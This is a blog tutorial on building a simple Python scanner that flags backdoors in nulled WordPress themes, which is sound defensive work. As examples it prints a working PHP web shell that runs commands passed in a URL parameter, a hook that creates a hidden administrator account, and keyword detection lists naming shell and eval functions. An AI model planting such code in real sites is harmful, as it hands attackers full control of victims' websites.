Apr 16, 2020

Wordpress nulled theme checker

We all love free stuff. So many people try to install premium themes and plugins on there WordPress blogs. Most of them use nulled themes or cracked versions of premium themes. Main disadvantage o these nulled themes is most of them are back-doored.

If we want to scan a plugin or theme for back-doors we must open all of it's files and check suspicious codes manually. Normally a WordPress theme contains hundred of files in various directories. It's very hard to check all of them one by one. So I tried to write a simple Python script to automate this process.

As the first step I used following code to get a list of all php files in the theme or plugin. Because many of back-doors are hidden in these PHP files.

for root, dirs, files in os.walk("C:\\xampp\\htdocs\\wordpress\\wp-content\\themes\\twentytwenty"):
	for file in files:
		if file.endswith(".php"):
			file_path = os.path.join(root, file)

In following image you can see we could get a list of all PHP files in the theme.


For demonstrating purpose I used "twentytwenty" theme which comes built in with wordpress.

Next we need to find suspicius codes i these PHP files.

Reverse and Bind shells

This is the most common backdoor we can find i wordpress themes. This kind of back-doors allow an attacker to connect remotely to a server. So when you install back-doored theme in your WordPress site attacker gain access to your site. He can completely control your website. There are two kid of web shells. A reverse tcp shell open a tcp connection from victim server to attacker's mashing. But a bind shell open a port on victim server and waits for an incoming connection from attacker. 

I n following example we can see a simple PHP shell.

if(isset($_GET["cmd"])&&isset($_GET["passwd"])&&strcmp($_GET["passwd"],"p455w07d")==0){echo exec($_GET["cmd"]);} 

As we know functions like exec, system are used for these web shells. So I added all of keywords used to build a shell to a python list. Then we can scan PHP files for these function names. If we found one of them in a PHP file we can assume there is some suspicious code in that file.


shell_payloads = ['exec', 'system', 'pcntl_fork', 'proc_open', 'fsockopen']

Hear exec and system functions are used to build a reverse tcp shell. pcntl_fork, proc_open, fsockopen are used to build bid shells.

User adding back-doors

Also there is another type of back-doors . They use WordPress native functions to create a secret user. So an attacker can directly log-in to our site and make changes.

Hear we can see how these functions work.

add_action( 'wp_head', 'create_backdoor' );

function create_backdoor() {
	require( 'wp-includes/registration.php' );
    if ( !username_exists( 'anonymous' ) ) {
        $user_id = wp_create_user( 'anonymous', 'p455w07d' );
        $user = new WP_User( $user_id );
        $user->set_role( 'administrator' ); 

In following list I added those functions as payloads.

user_payloads = ['wp_create_user', 'WP_User', 'set_role']

So we can detect if the PHP file tries to make a new backdoor user.

Encoded back-doors

In most times malware authors try to hide there malicious codes. So they encode them.  In most back-doored themes we can see base64 encoded payloads. By using this point we can search for encoding functions of PHP. Because they are rarely used in normal WordPress themes and plugins.

encoding_payloads = ['eval', 'base64_decode']

Hear base64_decode function i use used to encode payloads with base64 algorithm. eval is another PHP function. It takes one string as the argument and execute it as a PHP command. So an attacker can use base64_decode to decode the encoded payload and use eval to execute it.  In following code we can see base64 encoded version of above our web shell.


Now we know what methods an attacker use to backdoor a theme or plugin. Let's complete our script to detect them. At the moment we have three python lists with payloads to detect suspicious words.

file = open(file_path, 'r')
        content = file.read()
        for payload in payloads:
                if payload in content:
                        print('suspicious code found at ' + file_path)

I hope you can understand what it does. The script open file and read it's contents. Then it scans that content to detect if there any of above malicious words. If it detect one o them ill print the file path. So we can check that file manually and remove the backdoor.

You may download the complete script hear. You need to change the theme_path accordion to your theme. Just try it and tell me how it works I admire your opinions about this little tool. So leave a comment what are the mistakes and how we can improve it. Thank you for reading.



Aug 12
Error Handling | Python Programming

Errors are absolutely normal when programming. You may get hundred of errors while learning. Not....

Aug 18
Linux user management

Today I bought you another tutorial on Linux. Hear we are going to discus about basic user....

Mar 10
Reverse engineering tutorial for newbies

Today I selected an interesting topic to discuss. Here we are going to disassemble a binary file....

Replying to 's comment Cancel reply
Thilan Danushka Dissanayaka

Thilan Dissanayaka

Hi, I'm Thilan from Srilanka. An undergraduate Engineering student of University of Ruhuna. I love to explorer things about CS, Hacking, Reverse engineering etc.